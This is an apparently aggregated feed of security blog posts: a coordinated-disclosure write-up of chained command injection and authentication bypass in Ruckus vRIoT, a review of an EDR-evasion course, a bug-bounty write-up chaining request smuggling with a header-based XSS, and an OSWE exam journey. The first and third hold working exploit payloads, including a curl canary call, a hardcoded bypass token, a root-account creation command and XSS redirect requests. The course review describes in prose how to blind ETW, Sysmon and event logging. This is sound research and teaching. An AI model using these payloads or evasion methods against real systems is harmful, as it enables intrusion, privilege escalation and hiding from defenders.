Normal view

There are new articles available, click to refresh the page.
Before yesterdayUncategorized

Remote Command Execution in Ruckus IoT Controller (CVE-2020-26878 & CVE-2020-26879)

25 October 2020 at 00:00

Dear Fellowlship, today’s homily is about two vulnerabilites (CVE-2020-26878 and CVE-2020-26879) found in Ruckus vRIoT, that can be chained together to get remote command execution as root. Please, take a seat and listen to the story.

Prayers at the foot of the Altar a.k.a. disclaimer

We reported the vulnerability to the Ruckus Product Security Team this summer (26/Jul/2020) and they instantly checked and acknowledged the issues. After that, both parts agreed to set the disclosure date to October the 26th (90 days). We have to say that the team was really nice to us and that they kept us informed every month. If only more vendors had the same good faith.

Introduction

Every day more people are turning their homes into “Smart Homes”, so we are developing an immeasurable desire to find vulnerabilities in components that manage IoT devices in some way. We discovered the “Ruckus IoT Suite” and wanted to hunt for some vulnerabilities. We focused in Ruckus IoT Controller (Ruckus vRIoT), which is a virtual component of the “IoT Suite” in charge of integrating IoT devices and IoT services via exposed APIs.

Ruckus IoT architecture
Example of IoT architecture with Ruckus platforms (extracted from their website)

This software is provided as a VM in OVA format (Ruckus IoT 1.5.1.0.21 (GA) vRIoT Server Software Release), so it can be run by VMware and VirtualBox. This is a good way of obtaining and analyzing the software, as it serves as a testing platform.

Warming up

Our first step is to perform a bit of recon to check the attack surface, so we run the OVA inside a hypervisor and execute a simple port scan to list exposed services:

PORT      STATE    SERVICE    REASON      VERSION
22/tcp    open     ssh        syn-ack     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp    open     http       syn-ack     nginx
443/tcp   open     ssl/http   syn-ack     nginx
4369/tcp  open     epmd       syn-ack     Erlang Port Mapper Daemon
5216/tcp  open     ssl/http   syn-ack     Werkzeug httpd 0.12.1 (Python 3.5.2)
5672/tcp  open     amqp       syn-ack     RabbitMQ 3.5.7 (0-9)
9001/tcp  filtered tor-orport no-response
25672/tcp open     unknown    syn-ack
27017/tcp filtered mongod     no-response
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There are some interesting services. If we try to log in via SSH (admin/admin), we obtain a restricted menu where we can barely do anything:

1 - Ethernet Network
2 - System Details
3 - NTP Setting
4 - System Operation
5 - N+1
6 - Comm Debugger
x - Log Off

So our next step should be to get access to the filesystem and understand how this software works. We could not jailbreak the restricted menu, so we need to extract the files in a less fancy way: let’s sharpen our claws to gut the vmdk files.

In the end an OVA file is just a package that holds all the components needed to virtualize a system, so we can extract its contents and mount the virtual machine disk with the help of qemu and the NBD driver.

7z e file.ova
sudo modprobe nbd
sudo qemu-nbd -r -c /dev/nbd1 file.vmdk
sudo mount /dev/nbd1p1 /mnt

If that worked you can now access the whole filesystem:

psyconauta@insulanova:/mnt|⇒  ls
bin      data  home        lib64       mqtt-broker  root  srv  usr      VRIOT
boot     dev   initrd.img  lost+found  opt          run   sys  var      vriot.d
cafiles  etc   lib         mnt         proc         sbin  tmp  vmlinuz

We can see in the /etc/passwd file that the user “admin” does not have a regular shell:

admin:x:1001:1001::/home/admin:/VRIOT/ops/scripts/ras

That ras file is a bash script that corresponds to the restricted menu that we saw before.

BANNERNAME="                                Ruckus IoT Controller"
MENUNAME="                                      Main Menu"

if [ $TERM = "ansi" ]
then
set TERM=vt100
export TERM
fi

main_menu () {
draw_screen
get_input
check_input
if [ $? = 10 ] ; then main_menu ; fi
}


##------------------------------------------------------------------------------------------------
draw_screen () {
clear
echo "*******************************************************************************"
echo "$BANNERNAME"
echo "$MENUNAME"
echo "*******************************************************************************"
echo ""
echo "1 - Ethernet Network"
echo "2 - System Details"
echo "3 - NTP Setting"
echo "4 - System Operation"
echo "5 - N+1"
echo "6 - Comm Debugger"
echo "x - Log Off"
echo
echo -n "Enter Choice: "
}
...

Remote Command Injection (CVE-2020-26878)

Usually all these IoT routers/switches/etc with web interface contain functions that execute OS commands using user-controlled input. That means that if the input is not correctly sanitized, we can inject arbitrary commands. This is the lowest hanging fruit that always has to be checked, so our first task is to find the files related to the web interface:

psyconauta@insulanova:/mnt/VRIOT|⇒  find -iname "*web*" 2> /dev/null
./frontend/build/static/media/fontawesome-webfont.912ec66d.svg
./frontend/build/static/media/fontawesome-webfont.af7ae505.woff2
./frontend/build/static/media/fontawesome-webfont.674f50d2.eot
./frontend/build/static/media/fontawesome-webfont.b06871f2.ttf
./frontend/build/static/media/fontawesome-webfont.fee66e71.woff
./ops/packages_151/node_modules/faye-websocket
./ops/packages_151/node_modules/faye-websocket/lib/faye/websocket.js
./ops/packages_151/node_modules/faye-websocket/lib/faye/websocket
./ops/packages_151/node_modules/node-red-contrib-kontakt-io/node_modules/ws/lib/WebSocketServer.js
./ops/packages_151/node_modules/node-red-contrib-kontakt-io/node_modules/ws/lib/WebSocket.js
./ops/packages_151/node_modules/node-red-contrib-kontakt-io/node_modules/mqtt/test/websocket_client.js
./ops/packages_151/node_modules/node-red-contrib-kontakt-io/node_modules/websocket-stream
./ops/packages_151/node_modules/sockjs/lib/webjs.js
./ops/packages_151/node_modules/sockjs/lib/trans-websocket.js
./ops/packages_151/node_modules/websocket-extensions
./ops/packages_151/node_modules/websocket-extensions/lib/websocket_extensions.js
./ops/packages_151/node_modules/node-red-contrib-web-worldmap
./ops/packages_151/node_modules/node-red-contrib-web-worldmap/worldmap/leaflet/font-awesome/fonts/fontawesome-webfont.woff
./ops/packages_151/node_modules/node-red-contrib-web-worldmap/worldmap/leaflet/font-awesome/fonts/fontawesome-webfont.svg
./ops/packages_151/node_modules/node-red-contrib-web-worldmap/worldmap/leaflet/font-awesome/fonts/fontawesome-webfont.woff2
./ops/packages_151/node_modules/websocket-driver
./ops/packages_151/node_modules/websocket-driver/lib/websocket
./ops/docker/webservice
./ops/docker/webservice/web_functions.py
./ops/docker/webservice/web_functions_helper.py
./ops/docker/webservice/web.py

This way we identified several web-related files, and that the web interface is built on top of python scripts. In python there are lots of dangerous functions that, when used incorrectly, can lead to arbitrary code/command execution. The easy way is to try to find os.system() calls with user-controlled data in the main web file. A simple grep will shed light:

psyconauta@insulanova:/mnt/VRIOT|⇒  grep -i "os.system" ./ops/docker/webservice/web.py -A 5 -B 5
            reqData = json.loads(request.data.decode())
        except Exception as err:
            return Response(json.dumps({"message": {"ok": 0,"data":"Invalid JSON"}}), 200)
        userpwd = 'useradd '+reqData['username']+' ; echo  "'+reqData['username']+':'+reqData['password']+'" | chpasswd >/dev/null 2>&1'
        #call(['useradd ',reqData['username'],'; echo',userpwd,'| chpasswd'])
        os.system(userpwd)
        call(['usermod','-aG','sudo',reqData['username']],stdout=devNullFile)
    except Exception as err:
        print("err=",err)
        devNullFile.close()
        return errorResponseFactory(str(err), status=400)
--
            slave_ip = reqData['slave_ip']
            if reqData['slave_ip'] != config.get("vm_ipaddress"):
                master_ip = reqData['slave_ip']
                slave_ip = reqData['master_ip']
            crontab_str = "crontab -l | grep -q 'ha_slave.py' || (crontab -l ; echo '*/5 * * * * python3 /VRIOT/ops/scripts/haN1/ha_slave.py 1 "+master_ip+" "+slave_ip+" >> /var/log/cron_ha.log 2>&1') | crontab -"
            os.system(crontab_str)
            #os.system("python3 /VRIOT/ops/scripts/haN1/n1_process.py > /dev/null 2>&1 &")
    except Exception as err:
        devNullFile.close()
        return errorResponseFactory(str(err), status=400)
    else:
        devNullFile.close()
--
        call(['rm','-rf','/etc/corosync/authkey'],stdout=devNullFile)
        call(['rm','-rf','/etc/corosync/corosync.conf'],stdout=devNullFile)
        call(['rm','-rf','/etc/corosync/service.d/pcmk'],stdout=devNullFile)
        call(['rm','-rf','/etc/default/corosync'],stdout=devNullFile)
        crontab_str = "crontab -l | grep -v 'ha_slave.py' | crontab -"
        os.system(crontab_str)
        
        cmd = "supervisorctl status all | awk '{print $1}'"
        process_list = check_output(cmd,shell=True).decode('utf-8').split("\n")
        for process in process_list:
            if process and process != 'nplus1_service':
--
                        call(['service','sshd','stop'])
                        config.update("vm_ssh_enable","0")
                    call(['supervisorctl','restart','app:mqtt_service'])
                    call(['supervisorctl', 'restart', 'celery:*'])
                    if reqData["vm_ssh_enable"] == "0":
                        os.system("kill $(ps aux | grep 'ssh' | awk '{print $2}')")
            except Exception as err:
                return Response(json.dumps({"message": {"ok": 0,"data":"Invalid JSON"}}), 200)
        elif request.method == 'GET':
                response_json = {
                    "offline_upgrade_enable" : config.get("offline_upgrade_enable"),

The first occurrence already looks like vulnerable to command injection. When checking that code snippet we can observe that it is in fact vulnerable:

@app.route("/service/v1/createUser",methods=['POST'])
@token_required
def create_ha_user():
    try:
        devNullFile = open(os.devnull, 'w')
        try:
            reqData = json.loads(request.data.decode())
        except Exception as err:
            return Response(json.dumps({"message": {"ok": 0,"data":"Invalid JSON"}}), 200)
        userpwd = 'useradd '+reqData['username']+' ; echo  "'+reqData['username']+':'+reqData['password']+'" | chpasswd >/dev/null 2>&1'
        #call(['useradd ',reqData['username'],'; echo',userpwd,'| chpasswd'])
        os.system(userpwd)
        call(['usermod','-aG','sudo',reqData['username']],stdout=devNullFile)
    except Exception as err:
        print("err=",err)
        devNullFile.close()

We can see how, when calling the /service/v1/createUser endpoint, some parameters are directly taken from the POST request body (JSON-formatted) and concatenated to a os.system() call. As this concatenation is done without proper sanitization, we can inject arbitrary commands with ;. The vulnerability is easily confirmed using an HTTP server (python -m SimpleHTTPServer) as canary:

curl https://host/service/v1/createUser -k --data '{"username": ";curl http://TARGET:8000/pwned;#", "password": "test"}' -H "Authorization: Token 47de1a54fa004793b5de9f5949cf8882" -H "Content-Type: application/json"

Keep in mind that this method checks for a valid token (see the @token_required at line two of the snippet), so we need to be authenticated in order to exploit it. Our next step is to find a way to circumvent this check to get an RCE as an unauthenticated user.

Authentication bypass via API backdoor (CVE-2020-26879)

The first step to find a bypass would be to check the token_required function in order to understand how this “check” is performed:

def token_required(f):
    @wraps(f)
    def wrapper(*args, **kwargs):

        # Localhost Authentication
        if(request.headers.get('X-Real-Ip') == request.headers.get('host')):
            return f()
        # init call
        if(request.path == '/service/init' and request.method == 'POST'):
            return f()
        if(request.path == '/service/upgrade/flow' and request.method == 'POST'):
            return f()

        # N+1 Authentication  
        if "Token " not in request.headers.get('Authorization'):
            print('Auth='+request.headers.get('Authorization'))
            token = crpiot_obj.decrypt(request.headers.get('Authorization'))
            print('Token='+token)
            with open("/VRIOT/ops/scripts/haN1/service_auth") as fileobj:
                auth_code = fileobj.read().rstrip()
            if auth_code == token:
                return f()

        # Normal Authentication
        k = requests.get("https://0.0.0.0/app/v1/controller/stats",headers={'Authorization': request.headers.get('Authorization')},verify=False)
        if(k.status_code != 200):
            return Response(json.dumps({"detail": "Invalid Token."}), 401)
        else:
            return f()
    return wrapper

Let’s ignore the header comparison :) and focus in the N+1 authentication. As you can see, if the Authorization header does not contain the word “Token”, the header value is decrypted and compared with a hardcoded value from a file (/VRIOT/ops/scripts/haN1/service_auth). The encryption / decryption routines can be found in the file /VRIOT/ops/scripts/enc_dec.py:

    def __init__(self, salt='nplusServiceAuth'):
        self.salt = salt.encode("utf8")
        self.enc_dec_method = 'utf-8'
        self.str_key=config.get('n1_token').encode("utf8")




    def encrypt(self, str_to_enc):
        try:
            aes_obj = AES.new(self.str_key, AES.MODE_CFB, self.salt)
            hx_enc = aes_obj.encrypt(str_to_enc.encode("utf8"))
            mret = b64encode(hx_enc).decode(self.enc_dec_method)
            return mret
        except ValueError as value_error:
            if value_error.args[0] == 'IV must be 16 bytes long':
                raise ValueError('Encryption Error: SALT must be 16 characters long')
            elif value_error.args[0] == 'AES key must be either 16, 24, or 32 bytes long':
                raise ValueError('Encryption Error: Encryption key must be either 16, 24, or 32 characters long')
            else:
                raise ValueError(value_error)

The n1_token value can be found by grepping (spoiler: it is serviceN1authent). With all this information we can go to our python console and create the magic value:

>>> from Crypto.Cipher import AES
>>> from base64 import b64encode, b64decode
>>> salt='nplusServiceAuth'
>>> salt = salt.encode("utf8")
>>> enc_dec_method = 'utf-8'
>>> str_key = 'serviceN1authent'
>>> aes_obj = AES.new(str_key, AES.MODE_CFB, salt)
>>> hx_enc = aes_obj.encrypt('TlBMVVMx'.encode("utf8"))# From /VRIOT/ops/scripts/haN1/service_auth
>>> mret = b64encode(hx_enc).decode(enc_dec_method)
>>> print mret
OlDkR+oocZg=

So setting the Authorization header to OlDkR+oocZg= is enough to bypass the token check and to interact with the API. We can combine this backdoor with our remote command injection:

curl https://host/service/v1/createUser -k --data '{"username": ";useradd \"exploit\" -g 27; echo  \"exploit\":\"pwned\" | chpasswd >/dev/null 2>&1;sed -i \"s/Defaults        rootpw/ /g\" /etc/sudoers;#", "password": "test"}' -H "Authorization: OlDkR+oocZg=" -H "Content-Type: application/json"

And now log in:

X-C3LL@Kumonga:~|⇒  ssh [email protected]
[email protected]'s password:
Could not chdir to home directory /home/exploit: No such file or directory
$ sudo su
[sudo] password for exploit:
root@vriot:/# id
uid=0(root) gid=0(root) groups=0(root)

So… PWNED! >:). We have a shiny unauthenticated RCE as root.

EoF

Maybe the vulnerability was easy to spot and easy to exploit, but a root shell is a root shell. And nobody can argue with you when you have a root shell.

We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.

A Review of the Sektor7 RED TEAM Operator: Windows Evasion Course

3 May 2021 at 15:20

A Review of the Sektor7 RED TEAM Operator: Windows Evasion Course

Introduction

Another Sektor7 course, another review! This time it’s the RED TEAM Operator: Windows Evasion Course. You can catch my previous reviews of the RTO: Malware Development Essentials and RTO: Malware Development Intermediate courses as well.

Course Overview

This course, like the previous ones, builds on the knowledge gained in the previous courses. You don’t need to have taken the others if you already have a background in malware development, C++, assembly, and debugging, but if you haven’t, this will very likely be too advanced. The Essentials course might be much more your speed.

Here’s what Windows Evasion covers, according to the course page:

- How a modern detection looks like
- How to get rid of process' internal operations monitoring
- How to make your payload look benign in memory
- How to break process parent-child relation
- How to disrupt EPP/EDR logging
- What is Sysmon and how to bypass it

The course is split into 3 main sections: essentials, non-privileged user vector, and high-privileged user vector. I’ll cover each one, and then provide some thoughts on the course as a whole and the value it provides.

Section 1: Essentials

The course begins as usual, with links to the code and a custom VM with all the tools you’ll need. The first lesson is detail on how modern EDR detection works, covering the different user-mode and kernel-mode components, static analysis, DLL injection, hooking, kernel callbacks, logging, and machine learning. This is as good an overview of the end to end setup of EDRs as I’ve seen. It lays the foundation for the subsequent topics in a nice logical way. It also covers the differences between EDRs and AV, how Sysmon fits in, and how the line between AV and EDRs is becoming more blurred.

Next in essentials, the focus is on defeating various static analysis techniques, specifically entropy, image file details, and code signing. The idea is to make your malicious binary as similar to known-good binaries as possible, with special attention paid the the elements that are commonly flagged by static analysis. None of this is ground-breaking or totally novel, but it does drive home the idea that details matter, and they can add up to successfully achieving execution on a target or being caught.

Section 2: Non-Privileged User Vector

Un/Hooking

The second section covers a range of techniques that can be performed without needing elevated privileges. It begins with an explanation and demonstration via debugger of system call hooking, as performed by the main AV/EDR stand-in for the course, BitDefender. Bitdefender is a good option here, as a trial license is freely available, and it does more EDR-like things than a normal AV, like hooking.

Next, several different methods of defeating user-mode hooking are demonstrated, beginning with the classic overwriting of the .text section of ntdll.dll, which I’ve also covered here. The main disadvantage of this method is the need to map an additional new copy of ntdll.dll into the process address space, which is rather unusual from an AV/EDR perspective.

One alternative to this is to use Hell’s Gate, by Am0nsec and Smelly. This method uses some clever assembly to dynamically resolve the syscall number of a given function from the local copy of ntdll.dll and execute it. However this method has some drawbacks as well, mainly the fact that it will fail if the function to be resolved has already been hooked.

Reenz0h has a neat new modification (new to me at least!) to Hell’s Gate that gets around this problem, which he calls Halo’s Gate. It takes advantage of the fact that the system calls contained within ntdll.dll are sorted in numerically ascending order. The trick is to identity that a syscall has been hooked by checking for the jmp opcode (0xE9), and then traversing ntdll.dll both ahead and behind the target syscall. If an unhooked syscall is found 8 functions after the target, and its value is 0xFD, then by subtracting 8 from 0xFD, the the resulting 0xFD is our target syscall number. The same applies for a syscall before the target function. As no EDR hooks every syscall, eventually a clean one will be found and the target syscall number can be successfully calculated. This property of ordered syscall numbers in ntdll.dll is exploited to great effect in Syswhispers2. It was originally documented by the prolific modxp in a blog post here.

The last method of unhooking is a twist on the first, named, and I quote, “Perun’s Fart”. The goal is to get a clean copy of ntdll.dll without mapping it into our process again. It turns out that if a process is created in a suspended state, ntdll.dll is mapped by the Windows loader as part of the normal new process creation flow, but EDR hooks are not applied, since the main thread has not yet begun execution. So we can steal its copy of ntdll.dll and overwrite our local hooked version. Obviously this is a trade off, as this method will create a new process and involve cross-process memory reads. Still, it’s good to have multiple options when it comes to unhooking.

ETW Bypass

Next up is coverage of Event Tracing for Windows (ETW), how it can rat you out to AV/EDR, and how to blind it in your local process. ETW is especially relevant when executing .NET assemblies, such as in Cobalt Strike’s execute-assembly, as it can inform defenders of the exact assembly name and methods executed. The solution in this case is simple: Patch the ETWEventWrite function to return early with 0 in the RAX register. Anytime an ETW event is sent by the process, it will always succeed, without actually sending the message. Sweet and simple.

Avoiding IOCs

The last few videos of Section 2 cover different methods of hiding some specific indicators that can reveal the presence of malicious activity. First is module stomping. This is a way of executing shellcode from within a loaded DLL, avoiding the telltale sign of memory allocations within the process that are not backed by files on disk. A DLL that the host process does not use is loaded, then partially hollowed out and replaced with shellcode. Since the original DLL is properly loaded, no indication of injected shellcode is present.

Lastly this section covers hiding parent-child process ID relationships. The usual method is covered for PPID spoofing, using UpdateProcThreadAttribute to set the PPID to an arbitrary parent process. However two other methods I’d not encountered were covered as well. First, it turns out that processes created by the Windows task scheduler become a parent of the task scheduler svchost.exe process, and code is provided to use the Win32 API to execute a payload this way. The other method is one used by Emotet, which uses COM to programatically run WMI and create a new process. The parent in this case is the WmiPrvSE.exe process.

Section 3: High-Privileged User Vector

This section covers a variety of techniques that are available in high-privilege contexts. The focus is on Windows Eventlog, interrupting AV/EDR network communication, and Sysmon.

Eventlog

One video covers a method of hiding your activities from the Windows Eventlog. The idea is that the service that service responsible for Eventlog, Windows Event Log, has several threads that handle the processing of event log messages. By suspending these threads, the service continues to run, but does not process any events, thus hiding our activity. One caveat is that if the threads are resumed, all events that were missed in the interim will be processed, unless the machine is rebooted.

AV/EDR Network Communication

The next section looks at severing the connection between AV/EDR and its remote monitoring/logging server. This is done in two primary ways: adding Windows Firewall rules, and sink-holing traffic via the routing table. These two are pretty self-explanatory, but the real value here is the code samples provided for doing this in C/C++. The infamous and terrible COM is used in several places, and provides a good working example of COM programming. Creating routing table entries is actually a simple Win32 API call away.

Sysmon

The final section of the course covers identifying and neutralizing Sysmon. Sysmon is an excellent tool and frequently the backbone of many AV/EDR collection strategies, so identifying its presence and disabling its capabilities can go a long way in hiding your activities.

One problem for attackers is that Sysmon by design can be concealed in various ways. The name of the user-mode process, the minifilter driver name, and its altitude can all be modified to hide Sysmon’s presence. However there are enough reliable ways, like checking registry keys, to identify it. Code and commands are provided to find the registry keys and several techniques for shutting down Sysmon as well. One is to unload the minifilter driver. Another harks back to earlier in the course and shows how to patch our friend ETWEventWrite.

Takeaways

If you’ve read my other reviews of Sektor7 courses, you know what I’m going to say here. They are fantastic, and a fantastic value for the money as well, as most are around $200-250 USD. You can buy all 5 current courses for less than almost any other training out there, and 2573 times less than a single SANS course. You get lifetime access, and most importantly, the code samples. This to me is by far the single most valuable part of the course. Reenz0h is a great instructor with a wealth of knowledge and a great presentation style, but the true gift he gives you is a firm foundation of working code samples to build from and the context of how they are used. This course specifically covers basic COM programming in as understandable a way as COM can be covered, in my opinion. I’ve found that I learn best when I have some working code to tweak, play with, lookup its functions on MSDN, and mold it until it does what I want. No, the samples are not production ready and undetectable in every case, but these course give you the tools to make them that way and integrate them into your own tooling.

Conclusion

Props again to reenz0h and the Sektor7 crew. I’m glad they took a poll of their students and delivered a more advanced course. I get the feeling there is a ton more advanced material they could crank out, and I can’t wait for it.

Smuggling an (Un)exploitable XSS

13 November 2020 at 00:00

Smuggling an (Un)exploitable XSS

This is the story about how I’ve chained a seemingly uninteresting request smuggling vulnerability with an even more uninteresting header-based XSS to redirect network-internal web site users without any user interaction to arbitrary pages. This post also introduces a 0day in ArcGis Enterprise Server.

However, this post is not about how request smuggling works. If you’re new to this topic, have a look at the amazing research published by James Kettle, who goes into detail about the concepts.

Smuggling Requests for Different Response Lengths

So what I usually do when having a look at a single application is trying to identify endpoints that are likely to be proxied across the infrastructure - endpoints that are commonly proxied are for example API endpoints since those are usually infrastructurally separated from any front-end stuff. While hunting on a private HackerOne program, I’ve found an asset exposing an API endpoint that was actually vulnerable to a CL.TE-based request smuggling by using a payload like the following:

POST /redacted HTTP/1.1
Content-Type: application/json
Content-Length: 132
Host: redacted.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Foo: bar

Transfer-Encoding: chunked

4d
{"GeraetInfoId":"61e358b9-a2e8-4662-ab5f-56234a19a1b8","AppVersion":"2.2.40"}
0

GET / HTTP/1.1
Host: redacted.com
X: X

As you can see here, I’m smuggling a simple GET request against the root path of the webserver on the same vhost. So in theory, if the request is successfully smuggled, we’d see the root page as a response instead of the originally queried API endpoint.

To verify that, I’ve spun up a TurboIntruder instance using a configuration that issues the payload a hundred times:

While TuroboIntruder was running, I’ve manually refreshed the page a couple of times to trigger (simulate) the vulnerability. Interestingly, the attack seemed to work quite well, since there were actually two different response sizes, whereof one was returning the original response of the API:

And the other returned the start page:

This confirms the request smuggling vulnerability against myself. Pretty cool so far, but self-exploitation isn’t that much fun.

Poisoning Links Through ArcGis’ X-Forwarded-Url-Base Header

To extend my attack surface for the smuggling issue, I’ve noticed that the same server was also running an instance of the ArcGis Enterprise Server under another directory. So I’ve reviewed its source code for vulnerabilities that I could use to improve the request smuggling vulnerability. I’ve stumbled upon an interesting constellation affecting its generic error handling:

The ArcGIS error handler accepts a customized HTTP header called X-Forwarded-Url-Base that is used for the base of all links on the error page, but only if it is combined with another customized HTTP header called X-Forwarded-Request-Context. The value supplied to X-Forwarded-Request-Context doesn’t really matter as long as it is set.

So a minified request to exploit this issue against the ArcGis’ /rest/directories route looks like the following:

GET /rest/directories HTTP/1.1
Host: redacted.com
X-Forwarded-Url-Base: https://www.rce.wf/cat.html?
X-Forwarded-Request-Context: HackerOne

This simply poisons all links on the error page with a reference to my server at https://www.rce.wf/cat.html? (note the appended ? which is used to get rid off the automatically appended URL string /rest/services):

While this already looks like a good candidate to be chained with the smuggling, it still requires user interaction by having the user (victim) to click on any link on the error page.

However, I was actually looking for something that does not require any user interaction.

A Seemingly Unexploitable ArcGis XSS

You’ve probably guessed it already. The very same header combination as previously shown is also vulnerable to a reflected XSS. Using a payload like the following for the X-Forwarded-Url-Base:

X-Forwarded-Url-Base: https://www.rce.wf/cat.html?"><script>alert(1)</script>
X-Forwarded-Request-Context: HackerOne

leads to an alert being injected into the error page:

Now, a header-based XSS is usually not exploitable on its own, but it becomes easily exploitable when chained with a request smuggling vulnerability because the attacker is able to fully control the request.

While popping alert boxes on victims that are visiting the vulnerable server is funny, I was looking for a way to maximize my impact to claim a critical bounty. The solution: redirection.

If you’d now use a payload like the following:

X-Forwarded-Url-Base: https://www.rce.wf/cat.html?"><script>document.location='https://www.rce.wf/cat.html';</script>
X-Forwarded-Request-Context: HackerOne

…you’d now be able to redirect users.

Connecting the Dots

The full exploit looked like the following:

POST /redacted HTTP/1.1
Content-Type: application/json
Content-Length: 278
Host: redacted.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Foo: bar

Transfer-Encoding: chunked

4d
{"GeraetInfoId":"61e358b9-a2e8-4662-ab5f-56234a19a1b8","AppVersion":"2.2.40"}
0

GET /redacted/rest/directories HTTP/1.1
Host: redacted.com
X-Forwarded-Url-Base: https://www.rce.wf/cat.html?"><script>document.location='https://www.rce.wf/cat.html';</script>
X-Forwarded-Request-Context: HackerOne
X: X

While executing this attack at around 1000 requests per second, I was able to actually see some interesting hits on my server:

After doing some lookups I was able to confirm that those hits were indeed originating from the program’s internal network.

Mission Completed. Thanks for the nice critical bounty :-)

OSWE Review (AWAE Course)

1 November 2020 at 19:09

Introduction

Once again I am victorious! Being completely transparent, passing that exam was hard – there were periods that totally made me doubt myself. During these times all the blogs you’ve read about people failing multiple time begins to resonate with you. Thoughts such as “who the hell do I think I am to not experience the same” start to creep up. Many people assume since I have a number of certificates that maybe the process is somewhat trivial or that I’m some super smart genius. That is 100% false. It’s a grind, a fight and a constant mental battle. The only difference for me is I have been through so many battles that I can more easily block out the noise, not let it totally consume me and rely on previous successes for confidence. This still takes effort though.

Before we start, there is no way I can provide better information on how to pass the exam than what’s already publicly available. That’s all included in the bookmark section. If you don’t care about the journey feel free to skip to the exam & methodology sections. I never try to give the best because best is subjective, relative and in most aspects I’m still a student. I attempt to provide what I felt was missing from most blogs I read when attempting to study. The context – the thoughts, feelings, emotions and situational metadata most authors never include.  So let’s begin with that.

Mindset 💡

I never pursue certificates for job promotion, advancement or anything besides enhancing my personal knowledge. Therefore it’s never any pressure on me. Besides the kind that’s self injected. It’s all for the love of learning security and its related disciplines. So If you’re the type who brute forces exams and doesn’t really care about the knowledge gain you’re probably not going to like it here. You’ll get (some) technical details sure, but it won’t be an exam dump thanks-goodbye post. That’s not the point. There’s nothing wrong with trying to put yourself in a better position but you should be driven solely by passion. That behavior waters our field down – you’ll meet folks with certificates abc-xyz who can’t think or speak beyond basics. To each’s own.

Why Go After OSWE

What makes a man go after any certificate 🤣 it seemed like beautiful pain. I hope no one has forgotten that I obtained CISSP at the beginning of the year, Certified Cloud Practitioner, Certified Solutions Architect, and Security Specialty AWS certificates towards beginning of the summer. I didn’t plan on any of this I just identify areas where I’m weak and find the best certificates to try to bridge the gap. I couldn’t take it anymore in June, after aimlessly doing nothing for a whole week. I justified purchasing a new course as a birthday gift to myself 😂 how pitiful I know.

I don’t perform any exploit development, penetration testing or malware reversing for work (90% of this blog). I learn them for fun and to understand the more difficult domains of security. Work is mainly Application Security – so this was one of the rare times I found a certificate that actually aligned directly with what I do day-to-day. That’s not to say that those topics don’t contribute to me having a more intimate comprehensive understanding of security because they do.

I knew the course was mainly source-code review. I thought this was AWESOME since there’s not many white-box based courses vs.  1-million black-box counterparts. I figured because of this a large majority of folks would wash this course and certificate down the drain. Folks want to use their tools and get root👌 If you’re a security professional and you run from source-code I can’t take you serious. If you can only leverage tools written by others and not develop your own you’re going to severely limit yourself. That’s one thing, maybe more important for web application security professionals – the vulnerabilities occur in the source-code they just manifest themselves in the applications, the exploits that take advantage of the vulnerabilities need to be developed in some source language. The point is we all need to be comfortable and at-home at the source level. We’re more valuable to our teams, developers and the organizations we defend.

Signing Up

You need to register for the course well before you anticipate starting. The slots fill up pretty fast. The same goes for registering for the exam. I registered on June 29th and the first available lab date was July 11th which I accepted and anxiously awaited. I decided to do 90-days of lab time since I already did the other certificates I planned to slow roll this one and if possible, pass the exam by end of year.

The Lab

If you are not familiar with Offensive Security courses at the exact time your lab is set to begin you’ll receive an email with your VPN credentials, course PDF, and a link to download the videos that go alongside the PDF. Some people are religious about the order in which they prepare whether it’s video first, PDF first. Personally for me I watch the videos for the entire module once and then replicate using the PDF as reference, if needed. Since the videos tend to be more verbose.

Along with the materials, once connected to VPN you get your Control Panel to revert machines. Unique to this course, you’re provided with a WIKI. It contains the list of machines in your lab, their IP addresses and credentials. In addition to that you’re provided with skeleton code for most of the exploits throughout the different modules. Thanks offsec! I would recommend you write it all out by hand and never touch these.

I start the lab and 5 days later guess what? The course gets updated! I get an additional 30 days of lab time for free. Talk about positive vibes!

Prior To Upgrade

The PDF was 267 pages, the videos and included 6 modules.

After The Upgrade

The bulked-up PDF was now 412 pages, included the original 6 modules, 3 additional lab machines with more modern vulnerabilities and exploitation techniques, and  3 machines with no solution purely provided for exam preparation. Of the new 3 lab machines 2 were white-box and 1 was black-box. That’s slightly incredible to receive seemingly 50% more content essentially On the house. I welcomed it with open arms.

Throughout the lab you’ll become one with all sorts of SQLi’s – union-based, time-based, boolean-based, mysql flavor, postgres flavor. Authentication bypasses using session hijacking & session riding will become natural, XXE’s, SSTI’s, deserialization, file upload bypasses and others. You’ll find a variety of languages including Java, PHP, Node.js, Python, C# and Web Frameworks to analyze and get comfortable with. For the compiled languages you’ll learn techniques to recover the original source-code. They’ll drill the importance of database query logging and how to set it up with the many databases throughout the course.

The difference in this course is the perspective and mindset to which you approach finding the vulnerabilities. They’re all impossible to discover purely from a black-box perspective, you won’t be throwing a vulnerability scanner at any of these boxes to find anything, sqlmap will not work (not allowed in exam anyway)! Run nikto, gobuster (or any other kali tool) if you want but it’s useless. You need a healthy combination of brainwork, understanding sources to sinks, routes and controllers. Become comfortable understanding code flow and lots of it. Following the lab guide and videos there are still modules that take multiple days to grasp and over a week to replicate. It’s a marathon not a sprint.

Losing Steam and Yolo’ing It

I was super motivated initially (month 1) putting in like 3-4 hours weekdays and 8+ on weekends. Life happens and you naturally start to lose steam. That’s why I typically troll Reddit for Discord groups with others studying for same or similar certificates. Because you’re not always going to be motivated and having others locked-in keeps you accountable and in the game. There will always be folks to bounce ideas off of, rant and cry to. Probably the most special part is just having friend across the globe that love the same thing as you. Once you have enough friends it’ll be impossible to slack because you’ll have friends in all time zones during breakfast, lunch, dinner and while you sleep to exchange knowledge with. Greetz to all my boys in the Discord server mentioned below.

Towards the beginning of October (month 3) I found myself skipping the lab completely for 3-4 days at a time. It was easier to to say whatever. My original exam date was October 30th and I felt like this exam was consuming me way too much and I was in the lab for way too long. I developed my methodology discussed below, rescheduled the exam for a week earlier 10/24 at 10:00 EST.

